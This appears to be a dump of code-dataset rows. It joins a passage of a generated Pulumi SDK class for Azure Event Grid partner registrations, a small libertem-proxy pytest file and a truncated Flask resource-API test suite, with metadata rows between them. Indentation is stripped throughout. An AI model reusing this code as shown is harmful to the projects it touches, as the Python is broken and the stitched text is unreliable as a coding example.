associated with this partner registration. This is an optional property. Creating
partner namespaces is always permitted under the same Azure subscription as the one used
for creating the partner registration.
"""
return pulumi.get(self, "authorized_azure_subscription_ids")
@authorized_azure_subscription_ids.setter
def authorized_azure_subscription_ids(self, value: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]):
pulumi.set(self, "authorized_azure_subscription_ids", value)
@property
@pulumi.getter(name="customerServiceUri")
def customer_service_uri(self) -> Optional[pulumi.Input[str]]:
"""
The extension of the customer service URI of the publisher.
"""
return pulumi.get(self, "customer_service_uri")
@customer_service_uri.setter
def customer_service_uri(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "customer_service_uri", value)
@property
@pulumi.getter
def location(self) -> Optional[pulumi.Input[str]]:
"""
Location of the resource.
"""
return pulumi.get(self, "location")
@location.setter
def location(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "location", value)
@property
@pulumi.getter(name="logoUri")
def logo_uri(self) -> Optional[pulumi.Input[str]]:
"""
URI of the logo.
"""
return pulumi.get(self, "logo_uri")
@logo_uri.setter
def logo_uri(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "logo_uri", value)
@property
@pulumi.getter(name="longDescription")
def long_description(self) -> Optional[pulumi.Input[str]]:
"""
Long description for the custom scenarios and integration to be displayed in the portal if needed.
Length of this description should not exceed 2048 characters.
"""
return pulumi.get(self, "long_description")
@long_description.setter
def long_description(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "long_description", value)
@property
@pulumi.getter(name="partnerCustomerServiceExtension")
def partner_customer_service_extension(self) -> Optional[pulumi.Input[str]]:
"""
The extension of the customer service number of the publisher. Only digits are allowed and number of digits should not exceed 10.
"""
return pulumi.get(self, "partner_customer_service_extension")
@partner_customer_service_extension.setter
def partner_customer_service_extension(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "partner_customer_service_extension", value)
@property
@pulumi.getter(name="partnerCustomerServiceNumber")
def partner_customer_service_number(self) -> Optional[pulumi.Input[str]]:
"""
The customer service number of the publisher. The expected phone format should start with a '+' sign
followed by the country code. The remaining digits are then followed. Only digits and spaces are allowed and its
length cannot exceed 16 digits including country code. Examples of valid phone numbers are: +1 515 123 4567 and
+966 7 5115 2471. Examples of invalid phone numbers are: +1 (515) 123-4567, 1 515 123 4567 and +966 121 5115 24 7 551 1234 43
"""
return pulumi.get(self, "partner_customer_service_number")
@partner_customer_service_number.setter
def partner_customer_service_number(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "partner_customer_service_number", value)
@property
@pulumi.getter(name="partnerName")
def partner_name(self) -> Optional[pulumi.Input[str]]:
"""
Official name of the partner name. For example: "Contoso".
"""
return pulumi.get(self, "partner_name")
@partner_name.setter
def partner_name(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "partner_name", value)
@property
@pulumi.getter(name="partnerRegistrationName")
def partner_registration_name(self) -> Optional[pulumi.Input[str]]:
"""
Name of the partner registration.
"""
return pulumi.get(self, "partner_registration_name")
@partner_registration_name.setter
def partner_registration_name(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "partner_registration_name", value)
@property
@pulumi.getter(name="partnerResourceTypeDescription")
def partner_resource_type_description(self) -> Optional[pulumi.Input[str]]:
"""
Short description of the partner resource type. The length of this description should not exceed 256 characters.
"""
return pulumi.get(self, "partner_resource_type_description")
@partner_resource_type_description.setter
def partner_resource_type_description(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "partner_resource_type_description", value)
@property
@pulumi.getter(name="partnerResourceTypeDisplayName")
def partner_resource_type_display_name(self) -> Optional[pulumi.Input[str]]:
"""
Display name of the partner resource type.
"""
return pulumi.get(self, "partner_resource_type_display_name")
@partner_resource_type_display_name.setter
def partner_resource_type_display_name(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "partner_resource_type_display_name", value)
@property
@pulumi.getter(name="partnerResourceTypeName")
def partner_resource_type_name(self) -> Optional[pulumi.Input[str]]:
"""
Name of the partner resource type.
"""
return pulumi.get(self, "partner_resource_type_name")
@partner_resource_type_name.setter
def partner_resource_type_name(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "partner_resource_type_name", value)
@property
@pulumi.getter(name="setupUri")
def setup_uri(self) -> Optional[pulumi.Input[str]]:
"""
URI of the partner website that can be used by Azure customers to setup Event Grid
integration on an event source.
"""
return pulumi.get(self, "setup_uri")
@setup_uri.setter
def setup_uri(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "setup_uri", value)
@property
@pulumi.getter
def tags(self) -> Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]]:
"""
Tags of the resource.
"""
return pulumi.get(self, "tags")
@tags.setter
def tags(self, value: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]]):
pulumi.set(self, "tags", value)
@property
@pulumi.getter(name="visibilityState")
def visibility_state(self) -> Optional[pulumi.Input[Union[str, 'PartnerRegistrationVisibilityState']]]:
"""
Visibility state of the partner registration.
"""
return pulumi.get(self, "visibility_state")
@visibility_state.setter
def visibility_state(self, value: Optional[pulumi.Input[Union[str, 'PartnerRegistrationVisibilityState']]]):
pulumi.set(self, "visibility_state", value)
class PartnerRegistration(pulumi.CustomResource):
@overload
def __init__(__self__,
resource_name: str,
opts: Optional[pulumi.ResourceOptions] = None,
authorized_azure_subscription_ids: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
customer_service_uri: Optional[pulumi.Input[str]] = None,
location: Optional[pulumi.Input[str]] = None,
logo_uri: Optional[pulumi.Input[str]] = None,
long_description: Optional[pulumi.Input[str]] = None,
partner_customer_service_extension: Optional[pulumi.Input[str]] = None,
partner_customer_service_number: Optional[pulumi.Input[str]] = None,
partner_name: Optional[pulumi.Input[str]] = None,
partner_registration_name: Optional[pulumi.Input[str]] = None,
partner_resource_type_description: Optional[pulumi.Input[str]] = None,
partner_resource_type_display_name: Optional[pulumi.Input[str]] = None,
partner_resource_type_name: Optional[pulumi.Input[str]] = None,
resource_group_name: Optional[pulumi.Input[str]] = None,
setup_uri: Optional[pulumi.Input[str]] = None,
tags: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None,
visibility_state: Optional[pulumi.Input[Union[str, 'PartnerRegistrationVisibilityState']]] = None,
__props__=None):
"""
Information about a partner registration.
API Version: 2020-04-01-preview.
:param str resource_name: The name of the resource.
:param pulumi.ResourceOptions opts: Options for the resource.
:param pulumi.Input[Sequence[pulumi.Input[str]]] authorized_azure_subscription_ids: List of Azure subscription Ids that are authorized to create a partner namespace
associated with this partner registration. This is an optional property. Creating
partner namespaces is always permitted under the same Azure subscription as the one used
for creating the partner registration.
:param pulumi.Input[str] customer_service_uri: The extension of the customer service URI of the publisher.
:param pulumi.Input[str] location: Location of the resource.
:param pulumi.Input[str] logo_uri: URI of the logo.
:param pulumi.Input[str] long_description: Long description for the custom scenarios and integration to be displayed in the portal if needed.
Length of this description should not exceed 2048 characters.
:param pulumi.Input[str] partner_customer_service_extension: The extension of the customer service number of the publisher. Only digits are allowed and number of digits should not exceed 10.
:param pulumi.Input[str] partner_customer_service_number: The customer service number of the publisher. The expected phone format should start with a '+' sign
followed by the country code. The remaining digits are then followed. Only digits and spaces are allowed and its
length cannot exceed 16 digits including country code. Examples of valid phone numbers are: +1 515 123 4567 and
+966 7 5115 2471. Examples of invalid phone numbers are: +1 (515) 123-4567, 1 515 123 4567 and +966 121 5115 24 7 551 1234 43
:param pulumi.Input[str] partner_name: Official name of the partner name. For example: "Contoso".
:param pulumi.Input[str] partner_registration_name: Name of the partner registration.
:param pulumi.Input[str] partner_resource_type_description: Short description of the partner resource type. The length of this description should not exceed 256 characters.
:param pulumi.Input[str] partner_resource_type_display_name: Display name of the partner resource type.
:param pulumi.Input[str] partner_resource_type_name: Name of the partner resource type.
:param pulumi.Input[str] resource_group_name: The name of the resource group within the user's subscription.
:param pulumi.Input[str] setup_uri: URI of the partner website that can be used by Azure customers to setup Event Grid
integration on an event source.
:param pulumi.Input[Mapping[str, pulumi.Input[str]]] tags: Tags of the resource.
:param pulumi.Input[Union[str, 'PartnerRegistrationVisibilityState']] visibility_state: Visibility state of the partner registration.
"""
...
@overload
def __init__(__self__,
resource_name: str,
args: PartnerRegistrationArgs,
opts: Optional[pulumi.ResourceOptions] = None):
"""
Information about a partner registration.
API Version: 2020-04-01-preview.
:param str resource_name: The name of the resource.
:param PartnerRegistrationArgs args: The arguments to use to populate this resource's properties.
:param pulumi.ResourceOptions opts: Options for the resource.
"""
...
def __init__(__self__, resource_name: str, *args, **kwargs):
resource_args, opts = _utilities.get_resource_args_opts(PartnerRegistrationArgs, pulumi.ResourceOptions, *args, **kwargs)
if resource_args is not None:
__self__._internal_init(resource_name, opts, **resource_args.__dict__)
else:
__self__._internal_init(resource_name, *args, **kwargs)
def _internal_init(__self__,
resource_name: str,
opts: Optional[pulumi.ResourceOptions] = None,
authorized_azure_subscription_ids: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
customer_service_uri: Optional[pulumi.Input[str]] = None,
location: Optional[pulumi.Input[str]] = None,
logo_uri: Optional[pulumi.Input[str]] = None,
long_description: Optional[pulumi.Input[str]] = None,
partner_customer_service_extension: Optional[pulumi.Input[str]] = None,
partner_customer_service_number: Optional[pulumi.Input[str]] = None,
partner_name: Optional[pulumi.Input[str]] = None,
partner_registration_name: Optional[pulumi.Input[str]] = None,
partner_resource_type_description: Optional[pulumi.Input[str]] = None,
partner_resource_type_display_name: Optional[pulumi.Input[str]] = None,
partner_resource_type_name: Optional[pulumi.Input[str]] = None,
resource_group_name: Optional[pulumi.Input[str]] = None,
setup_uri: Optional[pulumi.Input[str]] = None,
tags: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None,
visibility_state: Optional[pulumi.Input[Union[str, 'PartnerRegistrationVisibilityState']]] = None,
__props__=None):
if opts is None:
opts = pulumi.ResourceOptions()
if not isinstance(opts, pulumi.ResourceOptions):
raise TypeError('Expected resource options to be a ResourceOptions instance')
if opts.version is None:
opts.version = _utilities.get_version()
if opts.id is None:
if __props__ is not None:
raise TypeError('__props__ is only valid when passed in combination with a valid opts.id to get an existing resource')
__props__ = PartnerRegistrationArgs.__new__(PartnerRegistrationArgs)
__props__.__dict__["authorized_azure_subscription_ids"] = authorized_azure_subscription_ids
__props__.__dict__["customer_service_uri"] = customer_service_uri
__props__.__dict__["location"] = location
__props__.__dict__["logo_uri"] = logo_uri
__props__.__dict__["long_description"] = long_description
__props__.__dict__["partner_customer_service_extension"] = partner_customer_service_extension
__props__.__dict__["partner_customer_service_number"] = partner_customer_service_number
__props__.__dict__["partner_name"] = partner_name
__props__.__dict__["partner_registration_name"] = partner_registration_name
__props__.__dict__["partner_resource_type_description"] = partner_resource_type_description
__props__.__dict__["partner_resource_type_display_name"] = partner_resource_type_display_name
__props__.__dict__["partner_resource_type_name"] = partner_resource_type_name
if resource_group_name is None and not opts.urn:
raise TypeError("Missing required property 'resource_group_name'")
__props__.__dict__["resource_group_name"] = resource_group_name
__props__.__dict__["setup_uri"] = setup_uri
__props__.__dict__["tags"] = tags
__props__.__dict__["visibility_state"] = visibility_state
__props__.__dict__["name"] = None
__props__.__dict__["provisioning_state"] = None
__props__.__dict__["system_data"] = None
__props__.__dict__["type"] = None
alias_opts = pulumi.ResourceOptions(aliases=[pulumi.Alias(type_="azure-nextgen:eventgrid:PartnerRegistration"), pulumi.Alias(type_="azure-native:eventgrid/v20200401preview:PartnerRegistration"), pulumi.Alias(type_="azure-nextgen:eventgrid/v20200401preview:PartnerRegistration"), pulumi.Alias(type_="azure-native:eventgrid/v20201015preview:PartnerRegistration"), pulumi.Alias(type_="azure-nextgen:eventgrid/v20201015preview:PartnerRegistration")])
opts = pulumi.ResourceOptions.merge(opts, alias_opts)
super(PartnerRegistration, __self__).__init__(
'azure-native:eventgrid:PartnerRegistration',
resource_name,
__props__,
opts)
@staticmethod
def get(resource_name: str,
id: pulumi.Input[str],
opts: Optional[pulumi.ResourceOptions] = None) -> 'PartnerRegistration':
"""
Get an existing PartnerRegistration resource's state with the given name, id, and optional extra
properties used to qualify the lookup.
:param str resource_name: The unique name of the resulting resource.
:param pulumi.Input[str] id: The unique provider ID of the resource to lookup.
:param pulumi.ResourceOptions opts: Options for the resource.
"""
opts = pulumi.ResourceOptions.merge(opts, pulumi.ResourceOptions(id=id))
__props__ = PartnerRegistrationArgs.__new__(PartnerRegistrationArgs)
__props__.__dict__["authorized_azure_subscription_ids"] = None
__props__.__dict__["customer_service_uri"] = None
__props__.__dict__["location"] = None
__props__.__dict__["logo_uri"] = None
__props__.__dict__["long_description"] = None
__props__.__dict__["name"] = None
__props__.__dict__["partner_customer_service_extension"] = None
__props__.__dict__["partner_customer_service_number"] = None
__props__.__dict__["partner_name"] = None
__props__.__dict__["partner_resource_type_description"] = None
__props__.__dict__["partner_resource_type_display_name"] = None
__props__.__dict__["partner_resource_type_name"] = None
__props__.__dict__["provisioning_state"] = None
__props__.__dict__["setup_uri"] = None
__props__.__dict__["system_data"] = None
__props__.__dict__["tags"] = None
__props__.__dict__["type"] = None
__props__.__dict__["visibility_state"] = None
return PartnerRegistration(resource_name, opts=opts, __props__=__props__)
@property
@pulumi.getter(name="authorizedAzureSubscriptionIds")
def authorized_azure_subscription_ids(self) -> pulumi.Output[Optional[Sequence[str]]]:
"""
List of Azure subscription Ids that are authorized to create a partner namespace
associated with this partner registration. This is an optional property. Creating
partner namespaces is always permitted under the same Azure subscription as the one used
for creating the partner registration.
"""
return pulumi.get(self, "authorized_azure_subscription_ids")
@property
@pulumi.getter(name="customerServiceUri")
def customer_service_uri(self) -> pulumi.Output[Optional[str]]:
"""
The extension of the customer service URI of the publisher.
"""
return pulumi.get(self, "customer_service_uri")
@property
@pulumi.getter
def location(self) -> pulumi.Output[str]:
"""
Location of the resource.
"""
return pulumi.get(self, "location")
@property
@pulumi.getter(name="logoUri")
def logo_uri(self) -> pulumi.Output[Optional[str]]:
"""
URI of the logo.
"""
return pulumi.get(self, "logo_uri")
@property
@pulumi.getter(name="longDescription")
def long_description(self) -> pulumi.Output[Optional[str]]:
"""
Long description for the custom scenarios and integration to be displayed in the portal if needed.
Length of this description should not exceed 2048 characters.
"""
return pulumi.get(self, "long_description")
@property
@pulumi.getter
def name(self) -> pulumi.Output[str]:
"""
Name of the resource.
"""
return pulumi.get(self, "name")
@property
@pulumi.getter(name="partnerCustomerServiceExtension")
def partner_customer_service_extension(self) -> pulumi.Output[Optional[str]]:
"""
The extension of the customer service number of the publisher. Only digits are allowed and number of digits should not exceed 10.
"""
return pulumi.get(self, "partner_customer_service_extension")
@property
@pulumi.getter(name="partnerCustomerServiceNumber")
def partner_customer_service_number(self) -> pulumi.Output[Optional[str]]:
"""
The customer service number of the publisher. The expected phone format should start with a '+' sign
followed by the country code. The remaining digits are then followed. Only digits and spaces are allowed and its
length cannot exceed 16 digits including country code. Examples of valid phone numbers are: +1 515 123 4567 and
+966 7 5115 2471. Examples of invalid phone numbers are: +1 (515) 123-4567, 1 515 123 4567 and +966 121 5115 24 7 551 1234 43
"""
return pulumi.get(self, "partner_customer_service_number")
@property
@pulumi.getter(name="partnerName")
def partner_name(self) -> pulumi.Output[Optional[str]]:
"""
Official name of the partner name. For example: "Contoso".
"""
return pulumi.get(self, "partner_name")
@property
@pulumi.getter(name="partnerResourceTypeDescription")
def partner_resource_type_description(self) -> pulumi.Output[Optional[str]]:
"""
Short description of the partner resource type. The length of this description should not exceed 256 characters.
"""
return pulumi.get(self, "partner_resource_type_description")
@property
@pulumi.getter(name="partnerResourceTypeDisplayName")
def partner_resource_type_display_name(self) -> pulumi.Output[Optional[str]]:
"""
Display name of the partner resource type.
"""
return pulumi.get(self, "partner_resource_type_display_name")
@property
@pulumi.getter(name="partnerResourceTypeName")
def partner_resource_type_name(self) -> pulumi.Output[Optional[str]]:
"""
Name of the partner resource type.
"""
return pulumi.get(self, "partner_resource_type_name")
@property
@pulumi.getter(name="provisioningState")
def provisioning_state(self) -> pulumi.Output[str]:
"""
Provisioning state of the partner registration.
"""
return pulumi.get(self, "provisioning_state")
@property
@pulumi.getter(name="setupUri")
def setup_uri(self) -> pulumi.Output[Optional[str]]:
"""
URI of the partner website that can be used by Azure customers to setup Event Grid
integration on an event source.
"""
return pulumi.get(self, "setup_uri")
@property
@pulumi.getter(name="systemData")
def system_data(self) -> pulumi.Output['outputs.SystemDataResponse']:
"""
The system metadata relating to Partner Registration resource.
"""
return pulumi.get(self, "system_data")
@property
@pulumi.getter
def tags(self) -> pulumi.Output[Optional[Mapping[str, str]]]:
"""
Tags of the resource.
"""
return pulumi.get(self, "tags")
@property
@pulumi.getter
def type(self) -> pulumi.Output[str]:
"""
Type of the resource.
"""
return pulumi.get(self, "type")
@property
@pulumi.getter(name="visibilityState")
def visibility_state(self) -> pulumi.Output[Optional[str]]:
"""
Visibility state of the partner registration.
"""
return pulumi.get(self, "visibility_state")
| 51.584142 | 454 | 0.685624 | 3,730 | 31,879 | 5.579088 | 0.065952 | 0.068188 | 0.071985 | 0.065545 | 0.864825 | 0.820663 | 0.763671 | 0.710812 | 0.681691 | 0.61802 | 0 | 0.014617 | 0.225258 | 31,879 | 617 | 455 | 51.667747 | 0.827962 | 0.301546 | 0 | 0.445983 | 1 | 0 | 0.160628 | 0.104837 | 0 | 0 | 0 | 0 | 0 | 1 | 0.155125 | false | 0.00277 | 0.019391 | 0 | 0.277008 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 |
0
| 6 |
0732a0a35499cb2f8dd3e3317232410829321054
| 191 |
py
|
Python
|
test/test_setupcall.py
|
jhgoebbert/jupyter-libertem-proxy
|
2f966744c08c14c534030c2623fe4a3a8590dabe
|
[
"BSD-3-Clause"
] | null | null | null |
test/test_setupcall.py
|
jhgoebbert/jupyter-libertem-proxy
|
2f966744c08c14c534030c2623fe4a3a8590dabe
|
[
"BSD-3-Clause"
] | null | null | null |
test/test_setupcall.py
|
jhgoebbert/jupyter-libertem-proxy
|
2f966744c08c14c534030c2623fe4a3a8590dabe
|
[
"BSD-3-Clause"
] | null | null | null |
def test_setupcall():
"""
Test the call of the setup function
"""
import jupyter_libertem_proxy as jx
print("\nRunning test_setupcall...")
print(jx.setup_libertem())
| 21.222222 | 40 | 0.659686 | 24 | 191 | 5.041667 | 0.666667 | 0.214876 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.225131 | 191 | 8 | 41 | 23.875 | 0.817568 | 0.183246 | 0 | 0 | 0 | 0 | 0.192857 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.25 | true | 0 | 0.25 | 0 | 0.5 | 0.5 | 1 | 0 | 0 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 0 | 0 | 1 |
0
| 6 |
07354a91e0ab5c683999d760204ed42f5952201f
| 15,695 |
py
|
Python
|
backend/tests/test_resources.py
|
sartography/star-drive
|
c0f33378d42913c3e677e07f74eb46d7b2b82a0a
|
[
"MIT"
] | null | null | null |
backend/tests/test_resources.py
|
sartography/star-drive
|
c0f33378d42913c3e677e07f74eb46d7b2b82a0a
|
[
"MIT"
] | 368 |
2018-12-18T14:43:20.000Z
|
2022-03-02T02:54:18.000Z
|
backend/tests/test_resources.py
|
sartography/star-drive
|
c0f33378d42913c3e677e07f74eb46d7b2b82a0a
|
[
"MIT"
] | 2 |
2019-10-02T03:06:06.000Z
|
2020-10-05T16:53:48.000Z
|
import unittest
from flask import json
from tests.base_test import BaseTest
from app import db, elastic_index
from app.model.resource import Resource
from app.model.resource_category import ResourceCategory
from app.model.resource_change_log import ResourceChangeLog
from app.model.user import Role
class TestResources(BaseTest, unittest.TestCase):
def test_resource_basics(self):
self.construct_resource()
r = db.session.query(Resource).first()
self.assertIsNotNone(r)
r_id = r.id
rv = self.app.get('/api/resource/%i' % r_id,
follow_redirects=True,
content_type="application/json")
self.assert_success(rv)
response = json.loads(rv.get_data(as_text=True))
self.assertEqual(response["id"], r_id)
self.assertEqual(response["title"], 'A+ Resource')
self.assertEqual(response["description"], 'A delightful Resource destined to create rejoicing')
def test_modify_resource_basics(self):
self.construct_resource()
r = db.session.query(Resource).first()
self.assertIsNotNone(r)
r_id = r.id
rv = self.app.get('/api/resource/%i' % r_id, content_type="application/json")
response = json.loads(rv.get_data(as_text=True))
response['title'] = 'Edwarardos Lemonade and Oil Change'
response['description'] = 'Better fluids for you and your car.'
response['website'] = 'http://sartography.com'
orig_date = response['last_updated']
rv = self.app.put('/api/resource/%i' % r_id, data=self.jsonify(response), content_type="application/json",
follow_redirects=True, headers=self.logged_in_headers())
self.assert_success(rv)
rv = self.app.get('/api/resource/%i' % r_id, content_type="application/json")
self.assert_success(rv)
response = json.loads(rv.get_data(as_text=True))
self.assertEqual(response['title'], 'Edwarardos Lemonade and Oil Change')
self.assertEqual(response['description'], 'Better fluids for you and your car.')
self.assertEqual(response['website'], 'http://sartography.com')
self.assertNotEqual(orig_date, response['last_updated'])
def test_delete_resource(self):
r = self.construct_resource()
r_id = r.id
rv = self.app.get('api/resource/%i' % r_id, content_type="application/json")
self.assert_success(rv)
rv = self.app.delete('api/resource/%i' % r_id, content_type="application/json", headers=self.logged_in_headers())
self.assert_success(rv)
rv = self.app.get('api/resource/%i' % r_id, content_type="application/json")
self.assertEqual(404, rv.status_code)
def test_delete_resource_with_admin_note_and_no_elastic_record(self):
r = self.construct_resource()
r_id = r.id
rv = self.app.get('api/resource/%i' % r_id, content_type="application/json")
self.assert_success(rv)
self.construct_admin_note(user=self.construct_user(), resource=r)
elastic_index.remove_document(r, 'Resource')
rv = self.app.delete('api/resource/%i' % r_id, content_type="application/json", headers=self.logged_in_headers())
self.assert_success(rv)
rv = self.app.get('api/resource/%i' % r_id, content_type="application/json")
self.assertEqual(404, rv.status_code)
def test_create_resource(self):
resource = {'title': "Resource of Resources", 'description': "You need this resource in your life.",
'organization_name': "Resource Org"}
rv = self.app.post('api/resource', data=self.jsonify(resource), content_type="application/json",
follow_redirects=True, headers=self.logged_in_headers())
self.assert_success(rv)
response = json.loads(rv.get_data(as_text=True))
self.assertEqual(response['title'], 'Resource of Resources')
self.assertEqual(response['description'], 'You need this resource in your life.')
self.assertIsNotNone(response['id'])
def test_get_resource_by_category(self):
c = self.construct_category()
r = self.construct_resource()
cr = ResourceCategory(resource=r, category=c, type='resource')
db.session.add(cr)
db.session.commit()
rv = self.app.get(
'/api/category/%i/resource' % c.id,
content_type="application/json",
headers=self.logged_in_headers())
self.assert_success(rv)
response = json.loads(rv.get_data(as_text=True))
self.assertEqual(1, len(response))
self.assertEqual(r.id, response[0]["resource_id"])
self.assertEqual(r.description, response[0]["resource"]["description"])
def test_get_resource_by_category_includes_category_details(self):
c = self.construct_category(name="c1")
c2 = self.construct_category(name="c2")
r = self.construct_resource()
cr = ResourceCategory(resource=r, category=c, type='resource')
cr2 = ResourceCategory(resource=r, category=c2, type='resource')
db.session.add_all([cr, cr2])
db.session.commit()
rv = self.app.get(
'/api/category/%i/resource' % c.id,
content_type="application/json",
headers=self.logged_in_headers())
self.assert_success(rv)
response = json.loads(rv.get_data(as_text=True))
self.assertEqual(r.id, response[0]["resource_id"])
self.assertEqual(2,
len(response[0]["resource"]["resource_categories"]))
self.assertEqual(
"c1", response[0]["resource"]["resource_categories"][0]["category"]
["name"])
def test_category_resource_count(self):
c = self.construct_category()
r = self.construct_resource()
cr = ResourceCategory(resource=r, category=c, type='resource')
db.session.add(cr)
db.session.commit()
rv = self.app.get(
'/api/category/%i' % c.id, content_type="application/json")
self.assert_success(rv)
response = json.loads(rv.get_data(as_text=True))
self.assertEqual(1, response["resource_count"])
def test_get_category_by_resource(self):
c = self.construct_category()
r = self.construct_resource()
cr = ResourceCategory(resource=r, category=c, type='resource')
db.session.add(cr)
db.session.commit()
rv = self.app.get(
'/api/resource/%i/category' % r.id,
content_type="application/json")
self.assert_success(rv)
response = json.loads(rv.get_data(as_text=True))
self.assertEqual(1, len(response))
self.assertEqual(c.id, response[0]["id"])
self.assertEqual(c.name, response[0]["category"]["name"])
def test_add_category_to_resource(self):
c = self.construct_category()
r = self.construct_resource()
rc_data = {"resource_id": r.id, "category_id": c.id}
rv = self.app.post(
'/api/resource_category',
data=self.jsonify(rc_data),
content_type="application/json")
self.assert_success(rv)
response = json.loads(rv.get_data(as_text=True))
self.assertEqual(c.id, response["category_id"])
self.assertEqual(r.id, response["resource_id"])
def test_set_all_categories_on_resource(self):
c1 = self.construct_category(name="c1")
c2 = self.construct_category(name="c2")
c3 = self.construct_category(name="c3")
r = self.construct_resource()
rc_data = [
{
"category_id": c1.id
},
{
"category_id": c2.id
},
{
"category_id": c3.id
},
]
rv = self.app.post(
'/api/resource/%i/category' % r.id,
data=self.jsonify(rc_data),
content_type="application/json")
self.assert_success(rv)
response = json.loads(rv.get_data(as_text=True))
self.assertEqual(3, len(response))
rc_data = [{"category_id": c1.id}]
rv = self.app.post(
'/api/resource/%i/category' % r.id,
data=self.jsonify(rc_data),
content_type="application/json")
self.assert_success(rv)
response = json.loads(rv.get_data(as_text=True))
self.assertEqual(1, len(response))
def test_remove_category_from_resource(self):
self.test_add_category_to_resource()
rv = self.app.delete('/api/resource_category/%i' % 1)
self.assert_success(rv)
rv = self.app.get(
'/api/resource/%i/category' % 1, content_type="application/json")
self.assert_success(rv)
response = json.loads(rv.get_data(as_text=True))
self.assertEqual(0, len(response))
def test_resource_change_log_types(self):
u = self.construct_user(email="editor@sartorgraphy.com", role=Role.admin)
r = {'id': 258, 'title': "A Resource that is Super and Great", 'description': "You need this resource in your life."}
rv = self.app.post('api/resource', data=self.jsonify(r), content_type="application/json",
follow_redirects=True, headers=self.logged_in_headers())
self.assert_success(rv)
logs = ResourceChangeLog.query.all()
self.assertIsNotNone(logs[-1].resource_id)
self.assertIsNotNone(logs[-1].user_id)
self.assertEqual(logs[-1].type, 'create')
rv = self.app.get('api/resource/%i' % r['id'], content_type="application/json")
self.assert_success(rv)
response = json.loads(rv.get_data(as_text=True))
response['title'] = 'Super Great Resource'
rv = self.app.put('/api/resource/%i' % r['id'], data=self.jsonify(response), content_type="application/json",
follow_redirects=True, headers=self.logged_in_headers(user=u))
self.assert_success(rv)
rv = self.app.get('/api/resource/%i' % r['id'], content_type="application/json")
self.assert_success(rv)
response = json.loads(rv.get_data(as_text=True))
self.assertEqual(response['title'], 'Super Great Resource')
logs = ResourceChangeLog.query.all()
self.assertIsNotNone(logs[-1].resource_id)
self.assertIsNotNone(logs[-1].user_id)
self.assertEqual(logs[-1].type, 'edit')
rv = self.app.delete('api/resource/%i' % r['id'], content_type="application/json",
headers=self.logged_in_headers())
self.assert_success(rv)
logs = ResourceChangeLog.query.all()
self.assertIsNotNone(logs[-1].resource_id)
self.assertIsNotNone(logs[-1].user_id)
self.assertEqual(logs[-1].type, 'delete')
def test_get_resource_change_log_by_resource(self):
r = self.construct_resource()
u = self.construct_user(email="editor@sartorgraphy.com", role=Role.admin)
rv = self.app.get('api/resource/%i' % r.id, content_type="application/json")
self.assert_success(rv)
response = json.loads(rv.get_data(as_text=True))
response['title'] = 'Super Great Resource'
rv = self.app.put('/api/resource/%i' % r.id, data=self.jsonify(response), content_type="application/json",
follow_redirects=True, headers=self.logged_in_headers(user=u))
self.assert_success(rv)
rv = self.app.get('/api/resource/%i/change_log' % r.id, content_type="application/json", headers=self.logged_in_headers())
self.assert_success(rv)
response = json.loads(rv.get_data(as_text=True))
self.assertEqual(response[-1]['user_id'], u.id)
def test_get_resource_change_log_by_user(self):
r = self.construct_resource()
u = self.construct_user(email="editor@sartorgraphy.com", role=Role.admin)
rv = self.app.get('api/resource/%i' % r.id, content_type="application/json")
self.assert_success(rv)
response = json.loads(rv.get_data(as_text=True))
response['title'] = 'Super Great Resource'
rv = self.app.put('/api/resource/%i' % r.id, data=self.jsonify(response), content_type="application/json",
follow_redirects=True, headers=self.logged_in_headers(user=u))
self.assert_success(rv)
rv = self.app.get('/api/user/%i/resource_change_log' % u.id, content_type="application/json", headers=self.logged_in_headers())
self.assert_success(rv)
response = json.loads(rv.get_data(as_text=True))
self.assertEqual(response[-1]['resource_id'], r.id)
def test_covid19_resource_lists(self):
self.construct_resource(covid19_categories=['COVID-19_for_Autism', 'Free_educational_resources'])
self.construct_resource(covid19_categories=['COVID-19_for_Autism', 'Edu-tainment', 'Free_educational_resources'])
self.construct_resource(covid19_categories=['COVID-19_for_Autism', 'Edu-tainment', 'Supports_with_Living'])
self.construct_resource(covid19_categories=['COVID-19_for_Autism', 'Edu-tainment', 'Visual_Aids'])
self.construct_resource(covid19_categories=['COVID-19_for_Autism', 'Edu-tainment', 'Health_and_Telehealth'])
rv = self.app.get('api/resource/covid19/COVID-19_for_Autism', content_type="application/json")
self.assert_success(rv)
response = json.loads(rv.get_data(as_text=True))
self.assertEqual(len(response), 5)
rv = self.app.get('api/resource/covid19/Edu-tainment', content_type="application/json")
self.assert_success(rv)
response = json.loads(rv.get_data(as_text=True))
self.assertEqual(len(response), 4)
rv = self.app.get('api/resource/covid19/Free_educational_resources', content_type="application/json")
self.assert_success(rv)
response = json.loads(rv.get_data(as_text=True))
self.assertEqual(len(response), 2)
rv = self.app.get('api/resource/covid19/Supports_with_Living', content_type="application/json")
